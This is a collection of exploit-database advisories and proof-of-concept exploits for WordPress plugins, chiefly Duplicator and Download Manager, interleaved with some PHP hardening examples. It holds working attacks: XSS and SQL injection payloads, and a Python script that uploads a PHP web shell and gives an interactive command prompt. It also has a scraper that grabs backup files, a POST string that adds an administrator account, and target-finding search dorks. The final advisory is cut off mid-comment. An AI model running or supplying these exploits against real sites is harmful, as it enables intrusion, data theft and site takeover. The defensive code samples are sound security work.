
# Exploit Title : Duplicator Wordpress Migration Plugin Reflected Cross Site Scripting (XSS)
# Date: 25-02-2018 
# Exploit Author : Stefan Broeder
# Contact : https://twitter.com/stefanbroeder
# Vendor Homepage: https://snapcreek.com/
# Software Link: https://wordpress.org/plugins/duplicator/
# Version: 1.2.32
# CVE : CVE-2018-7543
# Category : webapps

Description
===========
Duplicator is a WordPress plugin with more than 1 million active installations. Version 1.2.32 (and possibly previous versions) is affected by a Reflected XSS vulnerability.

Vulnerable part of code
=======================
File duplicator/installer/build/view.step4.php, line 254, allows direct injection of the $_POST variable 'json'.

Impact
======
Arbitrary JavaScript code can be run in the browser if a user is tricked into clicking a link or browsing to a URL under the attacker's control.

Proof of Concept
================
In order to exploit this vulnerability, an attacker has to send the following request to the server:

POST /wp-content/plugins/duplicator/installer/build/view.step4.php HTTP/1.1
Host: <hostname>
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:52.0) Gecko/20100101 Firefox/52.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Cookie: wordpress_5c016e8f0f95f039102cbe8366c5c7f3=wp%7C1518599198<omissis>
Connection: close
Upgrade-Insecure-Requests: 1
Pragma: no-cache
Cache-Control: no-cache
Content-Type: application/x-www-form-urlencoded
Content-Length: 91

json='a';};document.write(alert(document.cookie));MyViewModel%3dfunction(){this.status%3d''

The server replies as reported below:

HTTP/1.1 200 OK
Date: Mon, 12 Feb 2018 14:15:28 GMT
Server: Apache/2.4.29 (Debian)
Vary: Accept-Encoding
Content-Length: 10224
Connection: close
Content-Type: text/html; charset=UTF-8

...

<script>
MyViewModel = function() {
this.status = 'a';};document.write(alert(document.cookie));MyViewModel=function(){this.status='';
var errorCount = this.status.step2.query_errs || 0;
(errorCount >= 1 )
? $('#dup-step3-install-report-count').css('color', '#BE2323')
: $('#dup-step3-install-report-count').css('color', '#197713')
};
ko.applyBindings(new MyViewModel()); 
</script>

Solution
========

Update to version 1.2.33
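How the script-context injection above can be closed off, as an added example that is not Duplicator's own code: the raw $_POST['json'] string is parsed, reduced to the fields the view model needs, and re-emitted with the JSON_HEX_* flags so no quote or angle bracket survives into the `<script>` block. The function names and the shape of the status object are assumptions.

```php
<?php
// Added example, not the plugin's own code. Assumes the installer step
// receives a JSON document in $_POST['json'] and hands part of it to a
// Knockout view model, as view.step4.php does.

// VULNERABLE pattern (what the advisory describes): the POST value is
// interpolated straight into a JavaScript string literal. A value such as
//   a';};document.write(...);MyViewModel=function(){this.status='
// closes the literal and the function and runs attacker-chosen code.
function render_status_vulnerable(string $raw_json): string
{
    return "<script>\nMyViewModel = function() {\n"
         . "this.status = '{$raw_json}';\n};\n</script>";
}

// HARDENED pattern: parse the input as JSON, keep only the expected keys with
// the expected types, and re-encode with flags that turn <, >, &, ' and "
// into \uXXXX escapes. The value can then never terminate the string, the
// <script> element or an HTML comment, whatever the client sent.
function render_status_hardened(string $raw_json): string
{
    $decoded = json_decode($raw_json, true);
    if (!is_array($decoded)) {
        $decoded = array();   // malformed or non-JSON input: treat as empty
    }

    // Copy only the fields the page uses; anything else is dropped.
    $status = array(
        'step2' => array(
            'query_errs' => isset($decoded['step2']['query_errs'])
                ? (int) $decoded['step2']['query_errs']
                : 0,
        ),
    );

    $flags = JSON_HEX_TAG | JSON_HEX_AMP | JSON_HEX_APOS | JSON_HEX_QUOT;
    // wp_json_encode() is WordPress's wrapper around json_encode(); outside
    // WordPress json_encode() with the same flags behaves identically here.
    $encoded = function_exists('wp_json_encode')
        ? wp_json_encode($status, $flags)
        : json_encode($status, $flags);

    return "<script>\nMyViewModel = function() {\n"
         . "this.status = {$encoded};\n"
         . "var errorCount = this.status.step2.query_errs || 0;\n"
         . "};\nko.applyBindings(new MyViewModel());\n</script>";
}

// Demonstration with the advisory's payload: it is not valid JSON, so the
// hardened output carries an empty status object and no script breaks out.
$payload = "a';};document.write(alert(document.cookie));MyViewModel=function(){this.status='";
echo render_status_hardened($payload);                    // this.status = {"step2":{"query_errs":0}};
echo "\n";
echo render_status_hardened('{"step2":{"query_errs":"3"}}'); // this.status = {"step2":{"query_errs":3}};
```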
            
# Exploit Title: Duplicator 0.5.8 Privilege Escalation
# Date: 21-11-2014
# Software Link: https://wordpress.org/plugins/duplicator/
# Exploit Author: Kacper Szurek
# Contact: http://twitter.com/KacperSzurek
# Website: http://security.szurek.pl/
# Category: webapps

1. Description
  
Every registered user can create and download backup files.

File: duplicator\duplicator.php
add_action('wp_ajax_duplicator_package_scan',		'duplicator_package_scan');
add_action('wp_ajax_duplicator_package_build',		'duplicator_package_build');
add_action('wp_ajax_duplicator_package_delete',		'duplicator_package_delete');
add_action('wp_ajax_duplicator_package_report',		'duplicator_package_report');

http://security.szurek.pl/duplicator-058-privilege-escalation.html

2. Proof of Concept

Log in as a regular user (created using wp-login.php?action=register), then start a scan:

http://wordpress-url/wp-admin/admin-ajax.php?action=duplicator_package_scan

After that you can build a backup:

http://wordpress-url/wp-admin/admin-ajax.php?action=duplicator_package_build

This function will return JSON with the backup name inside the File key.

You can download the backup using:

http://wordpress-url/wp-snapshots/%file_name_from_json%

3. Solution:
  
Update to version 0.5.10
            
######################

# Exploit Title : Wordpress Duplicator <= 0.5.14 - SQL Injection & CSRF

# Exploit Author : Claudio Viviani

# Vendor Homepage : http://lifeinthegrid.com/labs/duplicator/

# Software Link : https://downloads.wordpress.org/plugin/duplicator.0.5.14.zip

# Date : 2015-04-08

# Tested on : Linux / Mozilla Firefox         

######################

# Description

 Wordpress Duplicator 0.5.14 suffers from a remote SQL Injection vulnerability.

 Location file: /view/actions.php

 This is the bugged AJAX function wp_ajax_duplicator_package_delete:

 function duplicator_package_delete() {

    DUP_Util::CheckPermissions('export');

    try {
        global $wpdb;
        $json     = array();
        $post     = stripslashes_deep($_POST);
        $tblName  = $wpdb->prefix . 'duplicator_packages';
        $postIDs  = isset($post['duplicator_delid']) ? $post['duplicator_delid'] : null;
        $list     = explode(",", $postIDs);
        $delCount = 0;

        if ($postIDs != null) {

            foreach ($list as $id) {
                $getResult = $wpdb->get_results("SELECT name, hash FROM `{$tblName}` WHERE id = {$id}", ARRAY_A);
                if ($getResult) {
                    $row       = $getResult[0];
                    $nameHash  = "{$row['name']}_{$row['hash']}";
                    $delResult = $wpdb->query("DELETE FROM `{$tblName}` WHERE id = {$id}");
                    if ($delResult != 0) {


 The $post['duplicator_delid'] variable is not sanitized.

 An authorized user with "export" permission, or a remote unauthenticated attacker
 who entices an authenticated admin to submit the request (CSRF), could use this
 vulnerability to execute arbitrary SQL queries on the victim WordPress web site.
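A hardened version of the handler quoted above, added here and not Duplicator's own code. It closes the two gaps this advisory names (unsanitized ids in the query, no CSRF token) and adds the capability check that the 0.5.8 advisory's scan/build/delete/report AJAX handlers lacked. The table name follows the quoted snippet; the nonce action name and the JSON response helpers are assumptions.

```php
<?php
// Added example, not Duplicator's own code. Hardened form of the
// wp_ajax_duplicator_package_delete handler quoted in the advisory.

function duplicator_package_delete_hardened()
{
    // 1. Who is calling? Without this check every registered user could reach
    //    the scan/build/delete handlers (the 0.5.8 privilege escalation).
    if (!current_user_can('export')) {
        wp_send_json_error(array('message' => 'insufficient privileges'), 403);
    }

    // 2. Did they mean to call? A nonce bound to this action stops the CSRF
    //    variant, where an admin is lured into submitting the request.
    //    The nonce action name 'duplicator_package_delete' is an assumption.
    check_ajax_referer('duplicator_package_delete', 'nonce');

    global $wpdb;
    $tblName = $wpdb->prefix . 'duplicator_packages';   // trusted, from config
    $raw     = isset($_POST['duplicator_delid']) ? wp_unslash($_POST['duplicator_delid']) : '';

    // 3. Validate the shape: a comma-separated list of positive integers.
    //    absint() reduces anything like "1 and (select ...)" to the integer 1,
    //    so no SQL fragment can reach the query.
    $ids = array();
    foreach (explode(',', (string) $raw) as $piece) {
        $id = absint(trim($piece));
        if ($id > 0) {
            $ids[] = $id;
        }
    }
    if (empty($ids)) {
        wp_send_json_error(array('message' => 'no valid ids'), 400);
    }

    // 4. Even validated values go through $wpdb->prepare(); %d is cast to int.
    $delCount = 0;
    foreach ($ids as $id) {
        $row = $wpdb->get_row(
            $wpdb->prepare("SELECT name, hash FROM `{$tblName}` WHERE id = %d", $id),
            ARRAY_A
        );
        if (!$row) {
            continue;   // unknown id: nothing to delete
        }
        $deleted = $wpdb->query(
            $wpdb->prepare("DELETE FROM `{$tblName}` WHERE id = %d", $id)
        );
        if ($deleted) {
            $delCount++;
            // Package files would be removed here using $row['name'] and $row['hash'].
        }
    }

    wp_send_json_success(array('removed' => $delCount));
}
add_action('wp_ajax_duplicator_package_delete', 'duplicator_package_delete_hardened');
// No wp_ajax_nopriv_ hook is registered, so unauthenticated callers never reach this code.
```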


######################

# PoC

 http://target/wp-admin/admin-ajax.php?action=duplicator_package_delete
 
 POST: duplicator_delid=1 and (select * from (select(sleep(20)))a)


######################

# Vulnerability Disclosure Timeline:

2015-04-08:  Discovered vulnerability
2015-04-08:  Vendor Notification
2015-04-09:  Vendor Response/Feedback 
2015-04-10:  Vendor Send Fix/Patch
2015-04-10:  Public Disclosure 

#######################

Discovered By : Claudio Viviani
                http://www.homelab.it
                http://ffhd.homelab.it (Free Fuzzy Hashes Database)

                info@homelab.it
                homelabit@protonmail.ch

                https://www.facebook.com/homelabit
                https://twitter.com/homelabit
                https://plus.google.com/+HomelabIt1/
                https://www.youtube.com/channel/UCqqmSdMqf_exicCe_DjlBww

#####################
            
# Exploit Title: WordPress Plugin Duplicator < 1.5.7.1 - Unauthenticated Sensitive Data Exposure to Account Takeover
# Google Dork: inurl:("plugins/duplicator/")
# Date: 2023-12-04
# Exploit Author: Dmitrii Ignatyev
# Vendor Homepage: https://duplicator.com/?utm_source=duplicator_free&utm_medium=wp_org&utm_content=desc_details&utm_campaign=duplicator_free
# Software Link: https://wordpress.org/plugins/duplicator/
# Version: 1.5.7.1
# Tested on: Wordpress 6.4
# CVE : CVE-2023-6114
# CVE-Link : https://wpscan.com/vulnerability/5c5d41b9-1463-4a9b-862f-e9ee600ef8e1/
# CVE-Link : https://research.cleantalk.org/cve-2023-6114-duplicator-poc-exploit/

A severe vulnerability has been discovered in the directory /wordpress/wp-content/backups-dup-lite/tmp/. This flaw not only exposes extensive information about the site, including its configuration, directories, and files, but more critically, it provides unauthorized access to sensitive data within the database and all data inside. Exploiting this vulnerability poses an imminent threat, leading to potential brute force attacks on password hashes and, subsequently, the compromise of the entire system.

POC:

1) It is necessary that either the administrator runs a backup or the auto-backup runs automatically at its scheduled time

2) The exploit will send file search requests every 5 seconds

3) I attack the site with this vulnerability using an exploit

The exploit sends a request to the server every 5 seconds to the path "http://your_site/wordpress/wp-content/backups-dup-lite/tmp/", and if it finds something in the directory index, it instantly parses all the data and displays it on the screen.

Exploit (python3):

#!/usr/bin/env python3
import requests
from bs4 import BeautifulSoup
import re
import time

url = "http://127.0.0.1/wordpress/wp-content/backups-dup-lite/tmp/"
processed_files = set()

def get_file_names(url):
    # Fetch the directory index and return the names it links to
    response = requests.get(url)

    if response.status_code == 200 and len(response.text) > 0:
        soup = BeautifulSoup(response.text, 'html.parser')
        links = soup.find_all('a')

        file_names = []
        for link in links:
            file_name = link.get('href')
            # Skip anchors without href, the parent-directory link and the sort-order links
            if file_name and file_name != "../" and not file_name.startswith("?"):
                file_names.append(file_name)

        return file_names
    return []

def get_file_content(url, file_name):
    file_url = url + file_name

    # Archives are skipped; only text files are fetched and printed
    if re.search(r'\.zip(?:\.|$)', file_name, re.IGNORECASE):
        print(f"Ignoring file: {file_name}")
        return None

    file_response = requests.get(file_url)

    if file_response.status_code == 200:
        return file_response.text
    return None

while True:
    # Poll every 5 seconds until the listing shows files from a running backup
    file_names = get_file_names(url)

    if file_names:
        print("File names on the page:")
        for file_name in file_names:
            if file_name not in processed_files:
                print(file_name)
                file_content = get_file_content(url, file_name)

                if file_content is not None:
                    print("File content:")
                    print(file_content)
                    processed_files.add(file_name)

    time.sleep(5)



-- 
With best regards,
Dmitrii Ignatyev, Penetration Tester
            
source: https://www.securityfocus.com/bid/61425/info

The Duplicator plugin for WordPress is prone to a cross-site-scripting vulnerability because it fails to properly sanitize user-supplied input.

An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks.

Duplicator 0.4.4 is vulnerable; other versions may also be affected. 

http://www.example.com/wp-content/plugins/duplicator/files/installer.cleanup.php?remove=1&package=%3Cscript%3Ealert%28document.cookie%29;%3C/script%3E 
            
# Exploit Title: WordPress Plugin Duplicate Page 4.4.1 - Stored Cross-Site Scripting (XSS)
# Date: 02/09/2021
# Exploit Author: Nikhil Kapoor
# Software Link: https://wordpress.org/plugins/duplicate-page/
# Version: 4.4.1
# Category: Web Application
# Tested on Windows

How to Reproduce this Vulnerability:

1. Install WordPress 5.7.2
2. Install and activate Duplicate Page
3. Navigate to Settings >> Duplicate Page and enter the XSS payload into the Duplicate Post Suffix input field.
4. Click Save Changes.
5. You will observe that the payload has been stored in the database; when the same functionality is triggered, the JavaScript payload executes and a pop-up appears.
6. Payload Used: "><svg/onload=confirm(/XSS/)>
            
# Exploit Title: WordPress Plugin Drag and Drop File Upload Contact Form 1.3.3.2 - Remote Code Execution
# Date: 2020-05-11
# Exploit Author: Austin Martin
# Google Dork: inurl:wp-content/uploads/wp_dndcf7_uploads/
# Google Dork: inurl:wp-content/plugins/drag-and-drop-multiple-file-upload-contact-form-7/
# Vendor Homepage: https://www.codedropz.com/
# Software Link: https://wordpress.org/plugins/drag-and-drop-multiple-file-upload-contact-form-7/
# Version: 1.3.3.2
# Tested on: WordPress 5.4.1, PHP 7.41
# CVE : N/A

# Notes:
# At time of disclosure, the WordPress page listed this plugin as being used by 10,000+ applications
# Application was patched by vendor within 24 hours of initial disclosure
# This exploit works by bypassing the allowed file types and file type sanitization. If lucky, a PHP file with a reverse shell can be uploaded and accessed

# Any file types can be added to the "supported_type"  parameter
# These uploaded files can be accessed at wp-content/uploads/wp_dndcf7_uploads/
# Dangerous file types such as php have "_.txt" appended to the end creating a text file
# This can be bypassed by adding '%' to the end of the allowed file type, and the end of the file name
# ex. "php%" for file type and "shell.php%" for filename
# The PHP payload in the POC can be easily modified to gain a reverse shell

#!/usr/bin/env python3
import string
import random
import requests
from bs4 import BeautifulSoup
import sys

payloadurl = ""

def RecurseLinks(base, file):
    # Walk the directory listing under wp-content/uploads/ looking for the uploaded file name
    global payloadurl

    headers = {"User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:76.0) Gecko/20100101 Firefox/76.0"}
    f = requests.get(base, headers=headers)
    soup = BeautifulSoup(f.content, "html.parser")

    for root in soup.find_all("a"):
        href = root.get("href")
        if href is None or href.startswith("/"):
            continue                          # no href, or an absolute (parent/sort) link
        elif href.endswith("/"):
            RecurseLinks(base + href, file)   # descend into a subdirectory
        else:
            if file in href:
                print("\n[+] File Found --> " + base + href)
                payloadurl = base + href

def main():
    print("WordPress Plugin 'Drag and Drop Multiple File Upload - Contact Form 7' 1.3.3.2 - Unauthenticated Remote Code Execution")
    print("@amartinsec --> Twitter\nCVE:2020-12800\n")

    # Build the request
    # Generate a random name for the uploaded file
    file = ''.join(random.sample((string.ascii_uppercase + string.digits), 6))

    urlinput = input("[+] Enter url to the vulnerable WordPress application: ")

    # Find the nonce used in the Ajax security string
    print("\n[+] Searching for security string nonce")
    headers = {'User-Agent': 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.47 Safari/537.36'}
    homepage = requests.get(urlinput, headers=headers).text
    if "ajax_nonce\":\"" not in homepage:
        print("[X] ajax_nonce not found on the home page")
        sys.exit(1)
    homepage = homepage.split("ajax_nonce\":\"", 1)[1]
    securitykey = homepage[:10]
    print("[+] Found security string --> " + securitykey)

    url = urlinput + "/wp-admin/admin-ajax.php"

    headers = {"User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:76.0) Gecko/20100101 Firefox/76.0",
               "Accept": "application/json, text/javascript, */*; q=0.01", "Accept-Language": "en-US,en;q=0.5",
               "Accept-Encoding": "gzip, deflate", "X-Requested-With": "XMLHttpRequest",
               "Content-Type": "multipart/form-data; boundary=---------------------------350278735926454076983690555601",
               }
    data = "-----------------------------350278735926454076983690555601\r\nContent-Disposition: form-data; name=\"supported_type\"\r\n\r\n" \
           "php%\r\n-----------------------------350278735926454076983690555601\r\nContent-Disposition: form-data; name=\"size_limit\"\r\n\r\n" \
           "5242880\r\n-----------------------------350278735926454076983690555601\r\nContent-Disposition: form-data; name=\"action\"\r\n\r\n" \
           "dnd_codedropz_upload\r\n-----------------------------350278735926454076983690555601\r\nContent-Disposition: form-data; name=\"type" \
           "\"\r\n\r\nclick\r\n-----------------------------350278735926454076983690555601\r\nContent-Disposition: form-data; name=\"security\"\r" \
           "\n\r\n" + securitykey + "\r\n-----------------------------350278735926454076983690555601\r\nContent-Disposition: form-data; name=\"upload-file\"; " \
           "filename=\"" + file + ".php%\"\r\nContent-Type: text/plain\r\n\r\n" \
           "<?php echo shell_exec($_GET['e'].' 2>&1'); ?>" \
           "\r\n-----------------------------350278735926454076983690555601--\r\n"

    print("\n[+] Sending payload to target")

    response = requests.post(url, headers=headers, data=data)

    if "200" in str(response):
        print("[+] Looks like a successful file upload!\n")

    elif "403" in str(response):
        print("\nFile Upload Failed")
        print("403 in response. Check security string")
        sys.exit(1)

    else:
        print("File upload failed. Try the manual way with Burp")
        sys.exit(1)

    print("[+] Crawling for the uploaded file. This may take a minute...")
    print("[+] Searching for " + file + ".php")

    RecurseLinks(urlinput + "/wp-content/uploads/", file)

    if payloadurl == "":
        print("Can't find the file on the web server")
        print("Try the manual method")
        sys.exit(1)

    # If all goes well, we can now send requests for RCE
    print("[+] Success\n")
    while True:
        cmd = input("[+] CMD: ")
        headers = {'User-Agent': 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.47 Safari/537.36'}
        request = requests.get(payloadurl + "?e=" + cmd, headers=headers)
        print(request.text)

if __name__ == "__main__":
    main()
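A server-side upload check written for the two failure modes the notes above describe (the allowed-type list arriving from the client in "supported_type", and a trailing '%' on the type and file name slipping past the extension rename); added example, not the plugin's own code. The function and constant names are assumptions; outside WordPress the WordPress helpers are replaced by plain PHP equivalents.

```php
<?php
// Added example, not the plugin's own code. Validates an upload the way the
// advisory's bypass suggests the plugin should have: server-side allowlist,
// name normalised before the extension is judged, content checked too.

// The allowlist lives on the server and is never read from the request.
const DNDCF7_ALLOWED_EXT = array('jpg', 'jpeg', 'png', 'gif', 'pdf', 'txt', 'zip');

/**
 * Returns a safe storage name, or null if the upload must be rejected.
 * $original_name is the client-supplied $_FILES[...]['name'];
 * $tmp_path is the temporary file on disk.
 */
function dndcf7_validate_upload(string $original_name, string $tmp_path): ?string
{
    // 1. Normalise first. sanitize_file_name() strips "%" and other special
    //    characters, so "shell.php%" becomes "shell.php" and is judged on its
    //    real extension. The regex is the stand-in used outside WordPress.
    $name = function_exists('sanitize_file_name')
        ? sanitize_file_name($original_name)
        : preg_replace('/[^A-Za-z0-9._-]/', '', $original_name);
    $name = trim($name, '.');
    if ($name === '' || strpos($name, '/') !== false || strpos($name, "\0") !== false) {
        return null;
    }

    // 2. Every extension in a multi-dot name must be allowed ("x.php.jpg" is
    //    rejected), so web-server handler matching on inner extensions cannot
    //    be abused. This also rejects "archive.tar.gz" unless "tar" is listed.
    $parts = explode('.', strtolower($name));
    if (count($parts) < 2) {
        return null;   // no extension at all
    }
    foreach (array_slice($parts, 1) as $ext) {
        if (!in_array($ext, DNDCF7_ALLOWED_EXT, true)) {
            return null;
        }
    }

    // 3. Check the content, not only the name: the WordPress helper compares
    //    the detected MIME type with the extension and rejects mismatches.
    if (function_exists('wp_check_filetype_and_ext')) {
        $check = wp_check_filetype_and_ext($tmp_path, $name);
        if (empty($check['ext']) || empty($check['type'])) {
            return null;
        }
        if (!empty($check['proper_filename'])) {
            $name = $check['proper_filename'];
        }
    }

    // 4. Store under a server-chosen random name with the verified extension,
    //    never under the client's name.
    $ext = substr($name, strrpos($name, '.') + 1);
    return bin2hex(random_bytes(8)) . '.' . $ext;
}

// Constructed checks; outside WordPress only the name-based stages run.
var_dump(dndcf7_validate_upload('shell.php%', '/tmp/none') === null);   // true: php is not allowed
var_dump(dndcf7_validate_upload('x.php.jpg', '/tmp/none') === null);    // true: inner php rejected
var_dump(dndcf7_validate_upload('notes.pdf', '/tmp/none') !== null);    // true: random name .pdf
```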
            
# Exploit Title: Wordpress Plugin Download Monitor WordPress V 4.4.4 - SQL Injection (Authenticated)
# Date 28.01.2022
# Exploit Author: Ron Jost (Hacker5preme)
# Vendor Homepage: https://www.download-monitor.com/
# Software Link: https://downloads.wordpress.org/plugin/download-monitor.4.4.4.zip
# Version: < 4.4.5
# Tested on: Ubuntu 20.04
# CVE: CVE-2021-24786
# CWE: CWE-89
# Documentation: https://github.com/Hacker5preme/Exploits/blob/main/Wordpress/CVE-2021-24786/README.md

'''
Description:
The Download Monitor WordPress plugin before 4.4.5 does not properly validate and escape the "orderby" GET parameter
before using it in a SQL statement when viewing the logs, leading to an SQL Injection issue
'''

# Banner:
banner = '''

   ___         __    ____   ___ ____  _      ____  _  _ _____ ___   __   
  / __\/\   /\/__\  |___ \ / _ \___ \/ |    |___ \| || |___  ( _ ) / /_  
 / /   \ \ / /_\_____ __) | | | |__) | |_____ __) | || |_ / // _ \| '_ \ 
/ /___  \ V //_|_____/ __/| |_| / __/| |_____/ __/|__   _/ /| (_) | (_) |
\____/   \_/\__/    |_____|\___/_____|_|    |_____|  |_|/_/  \___/ \___/ 
                                                                         
                                  [+] Download Monitor - SQL-Injection
                                  [@] Developed by Ron Jost (Hacker5preme)
'''
print(banner)

import argparse
import requests
from datetime import datetime

# User-Input:
my_parser = argparse.ArgumentParser(description='Wordpress Plugin Download Monitor - SQL Injection')
my_parser.add_argument('-T', '--IP', type=str)
my_parser.add_argument('-P', '--PORT', type=str)
my_parser.add_argument('-U', '--PATH', type=str)
my_parser.add_argument('-u', '--USERNAME', type=str)
my_parser.add_argument('-p', '--PASSWORD', type=str)
args = my_parser.parse_args()
target_ip = args.IP
target_port = args.PORT
wp_path = args.PATH
username = args.USERNAME
password = args.PASSWORD

print('[*] Starting Exploit at: ' + str(datetime.now().strftime('%H:%M:%S')))

# Authentication:
session = requests.Session()
auth_url = 'http://' + target_ip + ':' + target_port + wp_path + 'wp-login.php'
check = session.get(auth_url)
# Header:
header = {
    'Host': target_ip,
    'User-Agent': 'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:89.0) Gecko/20100101 Firefox/89.0',
    'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8',
    'Accept-Language': 'de,en-US;q=0.7,en;q=0.3',
    'Accept-Encoding': 'gzip, deflate',
    'Content-Type': 'application/x-www-form-urlencoded',
    'Origin': 'http://' + target_ip,
    'Connection': 'close',
    'Upgrade-Insecure-Requests': '1'
}

# Body:
body = {
    'log': username,
    'pwd': password,
    'wp-submit': 'Log In',
    'testcookie': '1'
}
auth = session.post(auth_url, headers=header, data=body)

# Exploit (WORKS ONLY IF ONE LOG EXISTS)
print('')
print ('[i] If the exploit does not work, log into wp-admin and add a file and download it to create a log')
print('')
# Generate payload for SQL-Injection
sql_injection_code = input('[+] SQL-INJECTION COMMAND: ')
sql_injection_code = sql_injection_code.replace(' ', '+')
exploitcode_url = 'http://' + target_ip + ':' + target_port + wp_path + 'wp-admin/edit.php?post_type=dlm_download&page=download-monitor-logs&orderby=download_date`' + sql_injection_code + '`user_id'
exploit = session.get(exploitcode_url)
print(exploit)
print('Exploit finished at: ' + str(datetime.now().strftime('%H:%M:%S')))
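Added example, not Download Monitor's own code: an ORDER BY column cannot be bound as a value with $wpdb->prepare() (it would be quoted as a string), so the fix for an injectable "orderby" GET parameter is a strict allowlist mapped to real column names, with the direction validated separately. The column map and function name are assumptions.

```php
<?php
// Added example, not the plugin's own code. Builds the ORDER BY clause for
// a logs listing from request parameters without ever placing request text
// into the SQL.

function dlm_logs_order_clause(array $query): string
{
    // Keys: the values the UI may send. Values: the real column names.
    // The assumed column list is illustrative only.
    $columns = array(
        'download_date' => 'download_date',
        'user_id'       => 'user_id',
        'download_id'   => 'download_id',
        'status'        => 'download_status',
    );

    $requested = isset($query['orderby']) ? (string) $query['orderby'] : 'download_date';
    // Anything that is not a map key, backticks and all, falls back to the default.
    $column = array_key_exists($requested, $columns) ? $columns[$requested] : 'download_date';

    // Direction is a two-value choice, never the raw parameter.
    $direction = (isset($query['order']) && strtoupper((string) $query['order']) === 'ASC')
        ? 'ASC' : 'DESC';

    return "ORDER BY `{$column}` {$direction}";
}

// Constructed inputs: the first is not a map key, so the default is used.
echo dlm_logs_order_clause(array('orderby' => 'download_date` -- anything'));
// ORDER BY `download_date` DESC
echo "\n";
echo dlm_logs_order_clause(array('orderby' => 'status', 'order' => 'asc'));
// ORDER BY `download_status` ASC
```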
            
source: https://www.securityfocus.com/bid/55487/info

The Download Monitor plugin for WordPress is prone to a cross-site scripting vulnerability because it fails to properly sanitize user-supplied input.

An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks.

Download Monitor 3.3.5.7 is vulnerable; other versions may also be affected. 

GET /wp/?dlsearch=">alert('xsstest') HTTP/1.1 
            
# WordPress Download Manager Free 2.7.94 & Pro 4 Authenticated Stored XSS

# Vendor Homepage: http://www.wpdownloadmanager.com
# Software Link: https://wordpress.org/plugins/download-manager
# Affected Versions: Free 2.7.94 & Pro 4
# Tested on: WordPress 4.2.2

# Discovered by Filippos Mastrogiannis
# Twitter: @filipposmastro
# LinkedIn: https://www.linkedin.com/pub/filippos-mastrogiannis/68/132/177

-- Description --

The stored XSS vulnerability allows any authenticated user to inject malicious code via the name of the uploaded file:

Example: <svg onload=alert(0)>.jpg

The vulnerability exists because the file name is not properly sanitized and this can lead to malicious code injection that will be executed on the target's browser.

-- Proof of Concept --

1. The attacker creates a new download package via the plugin's menu and uploads a file with the name: <svg onload=alert(0)>.jpg

2. The stored XSS can be triggered when an authenticated user (e.g. admin) attempts to edit this download package

-- Solution --

Upgrade to the latest version
            
* Exploit Title: WordPress Download Manager Cross-site Scripting
* Discovery Date: 2019-04-13
* Exploit Author: ThuraMoeMyint
* Author Link: https://twitter.com/mgthuramoemyint
* Vendor Homepage: https://www.wpdownloadmanager.com
* Software Link: https://wordpress.org/plugins/download-manager
* Version: 2.9.93
* Category: WebApps, WordPress
* CVE: CVE-2019-15889
Description
--

In the pro features of the WordPress Download Manager plugin, there is a Category Short-code feature which can be used to sort categories with an order-by function, used as ?orderby=title,publish_date.
By adding the parameter "> followed by any XSS payload, the XSS payload will execute.

To reproduce:

1. Go to the link where we can find ?orderby
2. Add the parameters >" and give a simple payload like <script>alert(1)</script>
3. The payload will execute.
--

PoC
--

<div class="btn-group btn-group-sm pull-right">
  <button type="button" class="btn btn-primary" disabled="disabled">Order &nbsp;</button>
  <a class="btn btn-primary" href="https://server/wpdmpro/category-short-code/?orderby=publish_date\"><script>alert(11)</script>&order=asc">Asc</a>
  <a class="btn btn-primary" href="https://server/wpdmpro/category-short-code/?orderby=publish_date\"><script>alert(11)</script>&order=desc">Desc</a>
</div>

--
Demo
--
https://server/wpdmpro/list-packages/?orderby=title%22%3E%3Cscript%3Ealert(1)%3C/script%3E&order=asc
--


Another reflected cross-site scripting via advanced search

https://server/wpdmpro/advanced-search/

https://server/wpdmpro/advanced-search/?search[publish_date]=2019-04-17+to+2019-04-17%22%3E%3Cscript%3Ealert(1)%3C/script%3E&search[update_date]=&search[view_count]=&search[download_count]=&search[package_size]=&search[order_by]=&search[order]=ASC&q=a
            
#!/usr/bin/python
#
# Exploit Name: Wordpress Download Manager 2.7.0-2.7.4 Remote Command Execution
#
# Vulnerability discovered by SUCURI TEAM (http://blog.sucuri.net/2014/12/security-advisory-high-severity-wordpress-download-manager.html)
#
# Exploit written by Claudio Viviani
#
#
# 2014-12-03:  Discovered vulnerability
# 2014-12-04:  Patch released (2.7.5)
#
# Video Demo: https://www.youtube.com/watch?v=rIhF03ixXFk
#
# --------------------------------------------------------------------
#
# The vulnerable function is located on "/download-manager/wpdm-core.php" file:
#
# function wpdm_ajax_call_exec()
# {
#    if (isset($_POST['action']) && $_POST['action'] == 'wpdm_ajax_call') {
#         if (function_exists($_POST['execute']))
#             call_user_func($_POST['execute'], $_POST);
#         else
#             echo "function not defined!";
#         die();
#     }
# }
#
# Any user from any post/page can call wpdm_ajax_call_exec() function (wp hook).
# wpdm_ajax_call_exec() call functions by call_user_func() through POST data:
#
#         if (function_exists($_POST['execute']))
#             call_user_func($_POST['execute'], $_POST);
#         else
#         ...
#         ...
#         ...
#
# $_POST data needs to be an array
#
#
# The wordpress function wp_insert_user is perfect:
#
# http://codex.wordpress.org/Function_Reference/wp_insert_user
#
# Description
#
# Insert a user into the database.
#
# Usage
#
# <?php wp_insert_user( $userdata ); ?>
#
# Parameters
#
# $userdata
#     (mixed) (required) An array of user data, stdClass or WP_User object.
#        Default: None
#
#
#
# Evil POST Data (Add new Wordpress Administrator):
#
# action=wpdm_ajax_call&execute=wp_insert_user&user_login=NewAdminUser&user_pass=NewAdminPassword&role=administrator
#
# ---------------------------------------------------------------------
#
# Dork google:  index of "wordpress-download"
#
# Tested on Wordpress Download Manager from 2.7.0 to 2.7.4 version with BackBox 3.x and python 2.6
#
# Http connection
